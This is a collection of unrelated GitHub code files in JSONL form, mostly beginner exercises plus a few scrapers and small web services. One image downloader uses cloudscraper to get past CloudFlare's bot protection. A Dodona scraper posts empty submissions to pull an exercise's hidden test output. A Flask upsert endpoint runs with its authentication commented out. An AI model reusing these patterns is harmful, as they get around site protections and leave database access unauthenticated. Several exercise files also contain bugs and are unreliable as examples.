+{"seq_id":"46879534324","text":"import unittest\nfrom day_18 import _solve\n\nclass TestSamples(unittest.TestCase):\n def test_sample_part_1(self):\n data = \"\"\".#.#.#\n...##.\n#....#\n..#...\n#.#..#\n####..\"\"\"\n p1 = _solve(data, 4)\n p2 = _solve(data, 5, True)\n self.assertEqual(p1, 4)\n self.assertEqual(p2, 17)\n","repo_name":"vstrimaitis/aoc-2015","sub_path":"test_day_18.py","file_name":"test_day_18.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15750348510","text":"import numpy\nfrom spynnaker.pyNN.models.neural_projections.connectors import (\n MultapseConnector as\n _BaseClass)\n\n\nclass MultapseConnector(_BaseClass):\n \"\"\"\n Create a multapse connector. The size of the source and destination\\\n populations are obtained when the projection is connected. The number of\\\n synapses is specified. when instantiated, the required number of synapses\\\n is created by selecting at random from the source and target populations\\\n with replacement. Uniform selection probability is assumed.\n\n :param n: This is the total number of synapses in the connection.\n :type n: int\n :param allow_self_connections:\n Bool. Allow a neuron to connect to itself or not.\n :type allow_self_connections: bool\n :param with_replacement:\n Bool. When selecting, allow a neuron to be re-selected or not.\n :type with_replacement: bool\n \"\"\"\n __slots__ = []\n\n def __init__(self, n, allow_self_connections=True,\n with_replacement=True, safe=True, verbose=False,\n rng=None):\n super(MultapseConnector, self).__init__(\n num_synapses=n, allow_self_connections=allow_self_connections,\n with_replacement=with_replacement, safe=safe, verbose=verbose,\n rng=rng)\n\n def get_rng_next(self, num_synapses, prob_connect):\n # Below is how numpy does multinomial internally...\n size = len(prob_connect)\n multinomial = numpy.zeros(size, int)\n total = 1.0\n dn = num_synapses\n for j in range(0, size - 1):\n multinomial[j] = self._rng.next(\n 1, distribution=\"binomial\",\n parameters={'n': dn, 'p': prob_connect[j] / total})\n dn = dn - multinomial[j]\n if dn <= 0:\n break\n total = total - prob_connect[j]\n if dn > 0:\n multinomial[size - 1] = dn\n\n return multinomial\n","repo_name":"apdavison/sPyNNaker8","sub_path":"spynnaker8/models/connectors/multapse_connector.py","file_name":"multapse_connector.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"5190745441","text":"class UnexpectedRSPValue(Exception):\n '''가위, 바위, 보 중 포함되지 않는 값인 경우 발생하는 에러'''\n\nvalue = input('가위, 바위, 보 중 하나를 입력해주세요. > ')\n\ntry:\n if value not in ['가위', '바위', '보']:\n raise UnexpectedRSPValue\nexcept UnexpectedRSPValue:\n print('에러가 발생했습니다.')","repo_name":"Ajrdn/Python-practice-","sub_path":"13. Class/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25004777031","text":"import requests\nimport bs4\nimport re\nimport time\n\nimport post_code\n\n\n# Connect to Dodona an receive the html-code\ndef get_html_code(link: str, token: str):\n response = requests.get(link, headers={'Authorization': token})\n\n soup = bs4.BeautifulSoup(response.content, \"html.parser\")\n # Get all the html-code under the class <div class=\"tab-content\">\n # This contains all \"Correctness\"-tabs and the \"Code\"-tab\n exercise = soup.find(\"div\", {\"class\": \"tab-content\"})\n\n return exercise\n\n\ndef get_ids(link: str) -> tuple:\n course_id = re.findall(r\"/courses/(\\d+)/\", link)[0]\n exercise_id = re.findall(r\"/activities/(\\d+)/\", link)[0]\n\n return course_id, exercise_id\n\n\ndef scraper(dodolink: str, token: str) -> tuple:\n course_id, exercise_id = get_ids(dodolink)\n\n empty_sub = post_code.push(\"empty.txt\", token, course_id, exercise_id)\n new_link = empty_sub[\"url\"][:-5]\n\n html_code = get_html_code(new_link, token)\n\n return html_code, course_id, exercise_id\n\n\ndef get_links(link: str, token: str) -> list[str]:\n substring = \"/courses/\"\n\n response = requests.get(link, headers={\"Authorization\": token})\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n\n too_much_links = [link[\"href\"] for link in soup.find_all(\"a\", href=True) if substring in link[\"href\"]]\n\n links = [\"https://dodona.ugent.be\" + link\n for link in too_much_links if \"submissions\" not in link and \"series\" in link]\n\n return links\n","repo_name":"BramWindey/AutoDodona","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37502562854","text":"def merge(lst1, lst2):\n \"\"\"Merges two sorted lists.\n\n >>> merge([1, 3, 5], [2, 4, 6])\n [1, 2, 3, 4, 5, 6]\n >>> merge([], [2, 4, 6])\n [2, 4, 6]\n >>> merge([1, 2, 3], [])\n [1, 2, 3]\n >>> merge([5, 7], [2, 4, 6])\n [2, 4, 5, 6, 7]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n new_list=[]\n def func(lst1,lst2):\n if len(lst1)==0:\n if len(lst2)!=0:\n new_list.append(lst2[0])\n func(lst1,lst2[1:])\n return\n if len(lst2)==0:\n if len(lst1)!=0:\n new_list.append(lst1[0])\n func(lst1[1:],lst2)\n return \n if lst1[0]>lst2[0]:\n new_list.append(lst2[0])\n func(lst1,lst2[1:])\n return\n else:\n new_list.append(lst1[0])\n func(lst1[1:],lst2)\n return\n func(lst1,lst2)\n return new_list\n\nclass Mint:\n \"\"\"A mint creates coins by stamping on years.\n\n The update method sets the mint's stamp to Mint.present_year.\n\n >>> mint = Mint()\n >>> mint.year\n 2021\n >>> dime = mint.create(Dime)\n >>> dime.year\n 2021\n >>> Mint.present_year = 2101 # Time passes\n >>> nickel = mint.create(Nickel)\n >>> nickel.year # The mint has not updated its stamp yet\n 2021\n >>> nickel.worth() # 5 cents + (80 - 50 years)\n 35\n >>> mint.update() # The mint's year is updated to 2101\n >>> Mint.present_year = 2176 # More time passes\n >>> mint.create(Dime).worth() # 10 cents + (75 - 50 years)\n 35\n >>> Mint().create(Dime).worth() # A new mint has the current year\n 10\n >>> dime.worth() # 10 cents + (155 - 50 years)\n 115\n >>> Dime.cents = 20 # Upgrade all dimes!\n >>> dime.worth() # 20 cents + (155 - 50 years)\n 125\n \"\"\"\n present_year = 2021\n def __init__(self):\n self.update()\n\n def create(self, coin):\n \"*** YOUR CODE HERE ***\"\n return coin(self.year)\n\n def update(self):\n \"*** YOUR CODE HERE ***\"\n self.year=Mint.present_year\n\n\nclass Coin:\n cents = None # will be provided by subclasses, but not by Coin itself\n\n def __init__(self, year):\n self.year = year\n\n def worth(self):\n \"*** YOUR CODE HERE ***\"\n temp=Mint.present_year-self.year-50\n if temp>0:\n return self.cents+temp\n else:\n return self.cents\n\n\nclass Nickel(Coin):\n cents = 5\n\n\nclass Dime(Coin):\n cents = 10\n\n\nclass VendingMachine:\n \"\"\"A vending machine that vends some product for some price.\n\n >>> v = VendingMachine('candy', 10)\n >>> v.vend()\n 'Nothing left to vend. Please restock.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n >>> v.restock(2)\n 'Current candy stock: 2'\n >>> v.vend()\n 'You must add $10 more funds.'\n >>> v.add_funds(7)\n 'Current balance: $7'\n >>> v.vend()\n 'You must add $3 more funds.'\n >>> v.add_funds(5)\n 'Current balance: $12'\n >>> v.vend()\n 'Here is your candy and $2 change.'\n >>> v.add_funds(10)\n 'Current balance: $10'\n >>> v.vend()\n 'Here is your candy.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n \n >>> w = VendingMachine('soda', 2)\n >>> w.restock(3)\n 'Current soda stock: 3'\n >>> w.restock(3)\n 'Current soda stock: 6'\n >>> w.add_funds(2)\n 'Current balance: $2'\n >>> w.vend()\n 'Here is your soda.'\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n num=0\n funds=0\n def __init__(self,name,price):\n self.name=name\n self.price=price\n def vend(self):\n if self.num>0:\n if self.funds>self.price:\n self.num-=1\n self.funds-=self.price\n print(\"'Here is your %s and $%d change.'\"%(self.name,self.funds))\n self.funds=0\n elif self.funds==self.price:\n self.num-=1\n self.funds-=self.price\n print(\"'Here is your %s.'\"%(self.name))\n self.funds=0\n else:\n print (\"'You must add $%d more funds.'\"%(self.price-self.funds))\n else:\n print(\"'Nothing left to vend. Please restock.'\")\n def add_funds(self,money):\n self.funds+=money\n if self.num==0:\n print(\"'Nothing left to vend. Please restock. Here is your $%d.'\"%(self.funds))\n self.funds=0\n else:\n print(\"'Current balance: $%d'\"%(self.funds))\n def restock(self,number):\n self.num+=number\n print (\"'Current %s stock: %d'\"%(self.name,self.num))\n\n\n","repo_name":"SunTianTian2333/cs61a","sub_path":"hw04/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10867487506","text":"class Node:\n def __init__(self, d):\n self.data = d\n self.next = None\n\n def insertWithTail(self, d):\n self.next = Node(d)\n return self.next\n\n# Key Points/Assumptions:\n'''\n1. Lengths are not same\n2. Singly lists\n'''\n\n# Algorithm:\n'''\n1. Brute force\n2. Pick the first node from 1st list and search in another list\n3. If found intersection is there else not.\n'''\n\n# Example:\n'''\n1. 1->2->3->4\n => 7->8->9\n 4->5->6\n'''\n\ndef findIntersection(head1, head2):\n cur1 = head1\n \n while cur1 != None:\n cur2 = head2\n while cur2 != None:\n if cur2 == cur1:\n return cur1\n cur2 = cur2.next\n\n cur1 = cur1.next\n\n return None\n\nhead1 = Node(9)\ntail = head1.insertWithTail(7).insertWithTail(9)\n\nhead2 = Node(8)\nhead2.insertWithTail(10).insertWithTail(8).insertWithTail(1123).next = tail\n\ntail.insertWithTail(7).insertWithTail(9)\n","repo_name":"purnesh42H/Algorithm-Problems","sub_path":"LinkedList/findIntersection.py","file_name":"findIntersection.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42703559405","text":"def eh_primo(p):\n if p < 2:\n return False\n if p == 2:\n return True\n if p % 2 == 0:\n return False\n i = 3\n while i < p:\n if p % i == 0:\n return False\n i += 2\n return True\ndef primos_entre(a,b):\n f=1\n while (f<b) and (f>a):\n if eh_primo(f) == True:\n print(f)\n f+=1\n f+=1\n","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_061/ch38_2019_03_16_15_11_31_961560.py","file_name":"ch38_2019_03_16_15_11_31_961560.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"393219129","text":"#coding:utf-8\r\nimport wsgiref.handlers\r\nimport os\r\nfrom functools import wraps\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp import template\r\nfrom google.appengine.api import users\r\nimport methods,logging\r\nfrom django.utils import simplejson\r\n\r\nimport urllib\r\nimport CloudFetch\r\nfrom models import Images\r\n\r\n\r\nclass AdminControl(webapp.RequestHandler):\r\n def render(self,template_file,template_value):\r\n path=os.path.join(os.path.dirname(__file__),template_file)\r\n self.response.out.write(template.render(path, template_value))\r\n def returnjson(self,dit):\r\n self.response.headers['Content-Type'] = \"application/json\"\r\n self.response.out.write(simplejson.dumps(dit))\r\ndef requires_admin(method):\r\n @wraps(method)\r\n def wrapper(self, *args, **kwargs):\r\n user = users.get_current_user()\r\n if not user:\r\n self.redirect(users.create_login_url(self.request.uri))\r\n return\r\n elif not users.is_current_user_admin():\r\n return self.error(403)\r\n else:\r\n return method(self, *args, **kwargs)\r\n return wrapper\r\n\r\nclass Admin_Upload(AdminControl):\r\n def get(self):\r\n self.render('views/upload.html', {})\r\n \r\n def post(self):\r\n bf=self.request.get(\"file\")\r\n if not bf:\r\n return self.redirect('/admin/upload/')\r\n name=self.request.body_file.vars['file'].filename\r\n mime = self.request.body_file.vars['file'].headers['content-type']\r\n if mime.find('image')==-1:\r\n return self.redirect('/admin/upload/')\r\n description=self.request.get(\"description\")\r\n image=methods.addImage( mime, description, bf, name)\r\n \r\n self.redirect('/show/%s/' %image.id)\r\n\r\nclass Admin_Upload2(AdminControl):\r\n def get(self):\r\n self.render('views/upload2.html', {})\r\n \r\n def post(self):\r\n dit={\"result\":\"error\"}\r\n bf=self.request.get(\"Filedata\")\r\n if not bf:\r\n return self.returnjson(dit)\r\n image=methods.addImage2(bf)\r\n if not image:\r\n return self.returnjson(dit)\r\n dit[\"result\"]=\"ok\"\r\n dit[\"id\"]=image.id\r\n return self.returnjson(dit)\r\n#TODO: 1. CHECK OF DUPLICATE, 2. ADD MULTIPLE BUTTONS?, 3. MODIFY UI, DELETE ABOUT....\r\n\r\nclass CloudPolling(AdminControl):\r\n def get(self):\r\n collector = CloudFetch.CloudFetch() \r\n urllist = collector.getUrlList()\r\n #url = 'http://www.technobuffalo.com/wp-content/uploads/2012/12/Google-Apps.jpeg'\r\n #urllist = urllist.append(url)\r\n images = Images.all()\r\n for url in urllist:\r\n bf = urllib.urlopen(url).read()\r\n #bf=self.request.get(\"file\")\r\n if not bf:\r\n return self.redirect('/')\r\n #name=self.request.body_file.vars['file'].filename\r\n #mime = self.request.body_file.vars['file'].headers['content-type']\r\n #if mime.find('image')==-1:\r\n # return self.redirect('/admin/upload/')\r\n #description=self.request.get(\"description\")\r\n mime = 'image'\r\n description = 'Fetched From Cloud'\r\n name = url.split('/')[len(url.split('/'))-1]\r\n #DETECT DUPLICATE\r\n flag = False;\r\n for i in images:\r\n if(i.name == name):\r\n flag = True\r\n break\r\n if(flag == True):\r\n continue\r\n image=methods.addImage( mime, description, bf, name)\r\n self.redirect('/')\r\n \r\nclass Delete_Image(AdminControl):\r\n @requires_admin\r\n def get(self,key):\r\n methods.delImage(key)\r\n self.redirect('/')\r\n \r\ndef main():\r\n application = webapp.WSGIApplication(\r\n [(r'/admin/upload/', Admin_Upload),\r\n (r'/admin/upload2/', Admin_Upload2),\r\n (r'/admin/del/(?P<key>[a-z,A-Z,0-9]+)', Delete_Image),\r\n (r'/admin/cloudfetch/', CloudPolling)\r\n ], debug=True)\r\n wsgiref.handlers.CGIHandler().run(application)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"msallk/photocollector","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21503335762","text":"#from IPython.display import clear_output\r\nimport random\r\n#ALL FUNCTIONS REQUIRED BY THE CODE\r\n\r\n#To display the type of board to play\r\ndef display_board(board):\r\n #clear_output()\r\n print(myboard[1]+' | ' + myboard[2] +' | '+ myboard[3])\r\n print(\"---------\")\r\n print(myboard[4]+' | ' + myboard[5] +' | '+ myboard[6])\r\n print(\"---------\")\r\n print(myboard[7]+' | ' + myboard[8] +' | '+ myboard[9])\r\n\r\n \r\n#To choose the X or O to by one of the players as a marker\r\ndef player_input():\r\n marker=''\r\n while not(marker == 'X' or marker == 'O'):\r\n marker= input(\"player 1 make you choice in X and O:\").upper()\r\n\r\n if marker=='X':\r\n return ('X','O')\r\n else:\r\n return('O','X')\r\n\r\n \r\n#To place the marker at the notified position\r\ndef place_marker(board,marker,position):\r\n board[position]=marker\r\n\r\n\r\n#To check all the rows , columns and diag for win condition\r\ndef win_check(board,mark):\r\n return ((board[1]==mark and board[2]==mark and board[3]==mark)or\r\n (board[4]==mark and board[5]==mark and board[6]==mark)or\r\n (board[7]==mark and board[8]==mark and board[9]==mark)or\r\n (board[1]==mark and board[5]==mark and board[9]==mark)or\r\n (board[7]==mark and board[5]==mark and board[3]==mark))\r\n\r\n\r\n#To randomly choose which player to start the game\r\ndef choose_first():\r\n \r\n if random.randint(0,1) == 0:\r\n return 'player1'\r\n else:\r\n return 'player2'\r\n\r\n \r\n#To Check if the position choosen is empty or not\r\ndef space_check(board,position):\r\n return board[position]==' '\r\n\r\n\r\n#To check for the Tie condition\r\ndef full_board_check(board):\r\n for i in range(1,10):\r\n if space_check(board,i):\r\n return False\r\n return True\r\n\r\n#player's choice of position to place the marker\r\ndef player_choice(board):\r\n position = 0\r\n num=[1,2,3,4,5,6,7,8,9]\r\n\r\n while position not in num or not space_check(board,position):\r\n position = int(input(\"enter your choice of positon within 1-9 bro:\"))\r\n\r\n return position\r\n\r\n\r\n#To play again \r\ndef replay():\r\n decision = input(\"Would you like to play the game again : y or n\").lower()\r\n return decision=='y'\r\n\r\n\r\n#ACTUAL CODE FOR THE GAME STARTS HERE\r\n\r\n#Initial while loop for the replay of game\r\nprint(\"Welcome to Tic Tac Toe Game\")\r\nwhile True:\r\n #setting up the game\r\n myboard=[' ',' ',' ',' ',' ',' ',' ',' ',' ',' ']\r\n display_board(myboard)\r\n player1_marker,player2_marker = player_input()\r\n turn=choose_first()\r\n print(turn+\" will go first.\")\r\n game = input(\"would you like to start the game: y or n\").lower()\r\n if game=='y':\r\n game_on = True\r\n else:\r\n game_on = False\r\n while game_on:\r\n #PLAYER ONE\r\n if turn == 'player1':\r\n display_board(myboard)\r\n #select position\r\n position=player_choice(myboard)\r\n #place mark in the position\r\n place_marker(myboard,player1_marker,position)\r\n #check win condition\r\n if win_check(myboard,player1_marker):\r\n display_board(myboard)\r\n print(\"PLAYER ONE IS THE WINNER\")\r\n game_on=False\r\n #check Tie condition\r\n else:\r\n if full_board_check(myboard):\r\n display_board(myboard)\r\n print(\"The Game is a Tie\")\r\n game_on=False\r\n \r\n #no Tie then select next player\r\n else:\r\n turn='player2'\r\n \r\n #PLAYER TWO\r\n else: \r\n display_board(myboard)\r\n #select position\r\n position=player_choice(myboard)\r\n #place mark in the position\r\n place_marker(myboard,player2_marker,position)\r\n #check win condition\r\n if win_check(myboard,player2_marker):\r\n display_board(myboard)\r\n print(\"PLAYER TWO IS THE WINNER\")\r\n game_on=False\r\n #check Tie condition\r\n else:\r\n if full_board_check(myboard):\r\n display_board(myboard)\r\n print(\"The Game is a Tie\")\r\n game_on=False\r\n \r\n #no Tie then select next player\r\n else:\r\n turn='player1'\r\n \r\n#end of loop\r\n if not replay():\r\n print(\"Thank You for Playing My Game Dude!\")\r\n break\r\n \r\n\r\n \r\n","repo_name":"ibrahimkhan521/python_examples","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73360519412","text":"n = int(input(\"Enter a number:\"))\n\nsed = 0\nsod = 0\n\nwhile n > 0:\n r = n % 10\n if r % 2 == 0:\n sed = sed + r\n else:\n sod = sod + r\n n = int(n / 10)\n\nprint(\"Sum of even digits:\", sed)\nprint(\"Sum of odd digits:\", sod)","repo_name":"Anshul-Ray/MajorPy","sub_path":"even_odd_numsum.py","file_name":"even_odd_numsum.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38119686422","text":"from flask_restful import reqparse, Resource\nfrom api.jwt_decorator import login_required\nfrom zeppos_microsoft_sql_server.ms_sql_server import MsSqlServer\nfrom io import BytesIO\nimport pandas as pd\nimport json\n\nclass UpsertByRecord(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('connection_string')\n parser.add_argument('dataframe')\n parser.add_argument('table_schema')\n parser.add_argument('table_name')\n parser.add_argument('batch_size')\n\n # @login_required\n def post(self):\n try:\n args = UpsertByRecord.parser.parse_args()\n ms_sql = MsSqlServer(args['connection_string'])\n df = pd.read_json(BytesIO(args['dataframe'].encode('utf-8')), orient='table')\n\n table_schema = args['table_schema']\n table_name = args['table_name']\n batch_size = int(args['batch_size'])\n\n ms_sql.create_table(table_schema, table_name, df)\n\n if ms_sql.save_dataframe_by_record(df, table_schema, table_name, batch_size):\n return None, 201\n else:\n return \"Could not insert data\", 500\n\n except Exception as error:\n return error, 500\n\n @staticmethod\n def add_routes(api):\n api.add_resource(UpsertByRecord, '/upsert/by_record/')\n","repo_name":"changrunner/ms_sql_server_proxy","sub_path":"api/upsert_by_record.py","file_name":"upsert_by_record.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3754783092","text":"import sys\n\ninput=sys.stdin.readline\n\nN=int(input())\nM=int(input())\narr=(list(map(int, input().split())))\n# print(N, M, arr)\n# 정렬\narr.sort()\n\n# 거리간 차 구하기\ndirection=[]\nfor i in range(1,N):\n direction.append(arr[i]-arr[i-1])\n\ndirection.sort()\nfor j in range(M-1):\n direction.pop()\n\n# print(direction)\nresult=0\nfor i in range(len(direction)):\n result+=direction[i]\n\nprint(result)","repo_name":"KB-team3/AlgoGGang","sub_path":"서지수/Week_10/B2212_센서.py","file_name":"B2212_센서.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"41882116706","text":"import os\nimport shutil\nimport unittest\n\nfrom click.testing import CliRunner\n\nfrom perfectextractor.extract import extract\n\nEUROPARL_DATA = os.path.join(os.path.dirname(__file__), 'data/europarl')\n\n\nclass TestCLI(unittest.TestCase):\n def setUp(self):\n self.runner = CliRunner()\n self.folder_out = os.path.join(EUROPARL_DATA, 'out')\n self.folder_cmp = os.path.join(EUROPARL_DATA, 'cmp')\n\n def test_arguments(self):\n runner = CliRunner()\n result = runner.invoke(extract)\n self.assertEqual(result.exit_code, 2) # need to provide arguments\n\n def test_perfectextractor(self):\n os.mkdir(self.folder_out)\n\n filename = 'en-nl-perfect.csv'\n out_file = os.path.join(self.folder_out, filename)\n result = self.runner.invoke(extract, [EUROPARL_DATA, 'en', 'nl',\n '--extractor', 'perfect',\n '--outfile', out_file])\n self.assertEqual(result.exit_code, 0)\n\n cmp_file = os.path.join(self.folder_cmp, filename)\n\n with open(out_file) as tmp:\n with open(cmp_file) as cmp:\n self.assertListEqual(tmp.readlines(), cmp.readlines())\n\n def test_recentpastextractor(self):\n os.mkdir(self.folder_out)\n\n filename = 'fr-nl-recentpast.csv'\n out_file = os.path.join(self.folder_out, filename)\n result = self.runner.invoke(extract, [EUROPARL_DATA, 'fr', 'nl',\n '--extractor', 'recent_past',\n '--outfile', out_file])\n self.assertEqual(result.exit_code, 0)\n\n cmp_file = os.path.join(self.folder_cmp, filename)\n\n with open(out_file) as tmp:\n with open(cmp_file) as cmp:\n self.assertListEqual(tmp.readlines(), cmp.readlines())\n\n def test_sinceextractor(self):\n os.mkdir(self.folder_out)\n\n filename = 'nl-en-since.csv'\n out_file = os.path.join(self.folder_out, filename)\n result = self.runner.invoke(extract, [EUROPARL_DATA, 'nl', 'en',\n '--extractor', 'since_duration',\n '--outfile', out_file])\n self.assertEqual(result.exit_code, 0)\n\n cmp_file = os.path.join(self.folder_cmp, filename)\n\n with open(out_file) as tmp:\n with open(cmp_file) as cmp:\n self.assertListEqual(tmp.readlines(), cmp.readlines())\n\n def tearDown(self):\n if os.path.isdir(self.folder_out):\n shutil.rmtree(self.folder_out)\n","repo_name":"UUDigitalHumanitieslab/perfectextractor","sub_path":"perfectextractor/tests/test_extract.py","file_name":"test_extract.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71694249653","text":"from sympy import divisor_count\nfrom math import pi, sqrt\nfrom cmath import exp\nfrom numpy import array\nimport matplotlib.pyplot as plt\nimport matplotlib.collections\nfrom string import Template\n\ndef memoize(f):\n cache = {}\n def ret(a):\n if a not in cache:\n cache[a] = f(a)\n return cache[a]\n\n return ret\n\nprimeOmega = memoize(lambda n: divisor_count(n, 1) - 1)\n\ndef saveSpiral(filename, theta = pi * (3 - sqrt(5)), limit = 2000, window = 50):\n dots = array(map(\n lambda n: sqrt(n) * exp(1j * n * theta),\n range(1, limit)\n ))\n\n sizes = array(map(\n lambda n: exp(-(0.7 + max(1, primeOmega(n))/6)),\n range(1, limit)\n ))\n\n patches = [\n plt.Circle([u.real, u.imag], size) for u, size in zip(dots, sizes)\n ]\n\n fig, ax = plt.subplots()\n coll = matplotlib.collections.PatchCollection(patches, facecolors='black')\n ax.add_collection(coll)\n ax.set_aspect(1)\n\n plt.axis([-window, window, -window, window])\n plt.savefig(filename, dpi=500)\n\n return plt\n\nif __name__ == \"__main__\":\n saveSpiral(\"main.png\", limit=500, window=25)\n","repo_name":"kylehovey/ulam-fermat-spiral","sub_path":"ulam.py","file_name":"ulam.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33429090475","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 25 12:15:37 2022\r\n\r\n@author: Miguel Peidro Paredes\r\n\"\"\"\r\n\r\n#Scrapping\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport shutil\r\n\r\n#Bypass CloudFlare\r\nimport cloudscraper\r\n\r\n#Change working directory to the External Drive\r\npath = \"Download Path\"\r\nos.chdir(path)\r\n\r\n#CloudFlare Bypass\r\nscraper = cloudscraper.create_scraper() # returns a CloudScraper instance\r\n\r\n\r\n#Scrapping Path\r\nheader = 'https://www.xtrafondos.com/buscar/'\r\n\r\n#Theme Request\r\nprint(\"What images do you want to download?:\")\r\ntheme = input()\r\n\r\nwhile(True):\r\n\r\n #Proportions Request\r\n print(\"Do you want to filter by proportion?\")\r\n print(\"n -> none\")\r\n print(\"h -> horizontal\")\r\n print(\"v -> vertical\")\r\n \r\n ori = input()\r\n \r\n if (ori == \"n\"):\r\n break\r\n elif (ori == \"h\"):\r\n break\r\n elif (ori == \"v\"):\r\n break\r\n \r\n else:\r\n (\"Wrong input\")\r\n \r\n \r\n\r\n#Requesting result pages number\r\nurl = header + theme\r\n\r\npag_num =\"\"\r\n\r\nfor i in range (1, 10):\r\n try: \r\n result_pages = scraper.get(url, timeout=10)\r\n except:\r\n continue\r\n \r\n try:\r\n #Soup Results\r\n soup = BeautifulSoup(result_pages.text, 'html.parser')\r\n \r\n title = str(soup.findAll('h1', attrs={'class' : 'titlepages'})[0].get_text())\r\n \r\n #Not Results\r\n if \"no ha coincidido con ningún fondo\" in title:\r\n break\r\n else:\r\n pag_num = \"0\"\r\n \r\n for pages in soup.findAll('div', attrs={'class' : 'content-links-pagination'}):\r\n pag_num = pages.find_all(\"a\")[-1].get_text()\r\n \r\n #Results found\r\n if (pag_num.isnumeric()):\r\n break\r\n \r\n except:\r\n continue\r\n \r\nprint(pag_num)\r\n\r\n \r\nif (pag_num.isnumeric()):\r\n \r\n if (pag_num == \"0\"):\r\n print(\"Just One Page\")\r\n \r\n else:\r\n \r\n count = 0\r\n \r\n for i in range (1, int(pag_num)+1):\r\n \r\n if (ori == \"n\"):\r\n url = header + theme + '/' + str(i)\r\n \r\n elif (ori == \"h\"):\r\n url = header + theme + \"/horizontal/\" + str(i)\r\n \r\n elif (ori == \"v\"):\r\n url = header + theme + \"/vertical/\" + str(i)\r\n \r\n \r\n try: \r\n results = scraper.get(url, timeout=10)\r\n except:\r\n print(\"Unreached Results\")\r\n \r\n #Soup Results\r\n soup = BeautifulSoup(results.text, 'html.parser')\r\n \r\n #Select Main content\r\n for maincontent in soup.findAll('div', attrs={'id' : 'pluswall'}):\r\n \r\n for url_ext in maincontent.findAll('a', href=True):\r\n \r\n print (url_ext['href'])\r\n \r\n try: \r\n results = scraper.get(url_ext['href'], timeout=10)\r\n except:\r\n print(\"Unreached Results\")\r\n \r\n #Soup Results\r\n img_soup = BeautifulSoup(results.text, 'html.parser')\r\n \r\n for button in img_soup.findAll('div', attrs={'class' : 'downl'}):\r\n \r\n download_url = button.findAll('a', href=True)[0]['href']\r\n \r\n try:\r\n \r\n file_name = \"wallpaper\" + str(count) +'.jpg'\r\n \r\n with open(file_name, 'wb') as f:\r\n img = scraper.get(download_url, stream=True)\r\n img.raw.decode_content = True\r\n shutil.copyfileobj(img.raw, f)\r\n \r\n \r\n except Exception as e:\r\n print(e)\r\n \r\n \r\n \r\n count += 1\r\n \r\nelse:\r\n print(\"No results\")","repo_name":"redAboy/Image-Set-Autonomous-Downloaders","sub_path":"xtrafondos_downloader.py","file_name":"xtrafondos_downloader.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21182916491","text":"import sys\nfrom collections import deque\n\nJosephus = []\nn, k = map(int, sys.stdin.readline().rstrip().split())\ncircle = [i for i in range(1, n+1)]\nindex = -1\ncnt_k = 0\nwhile len(circle) != 0:\n index += 1\n if index == len(circle):\n index = 0\n cnt_k += 1\n if cnt_k == k:\n Josephus.append(circle[index])\n del circle[index]\n index -= 1\n cnt_k = 0\nprint('<', end='')\nfor i, ele in enumerate(Josephus):\n if i == len(Josephus)-1:\n print(ele, end='')\n else:\n print(ele, end=', ')\nprint('>')","repo_name":"gyuuuu/Algorithm","sub_path":"python_BOJ/class2/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10106973218","text":"def cadastro_produto(database, id_produto, nome, dados, quantidade, descricao):\n dict_cadastro = {\n 'ID': id_produto,\n 'Nome': nome,\n 'Especificações': dados,\n 'Quantidade': quantidade,\n 'Descrição': descricao,\n }\n database.append(dict_cadastro)\n print(\"\\nCadastrado com sucesso\\n\")\n return database\n\ndef id_livre(id_produto, database):\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n print(\"Esse ID já existe\")\n return False\n return 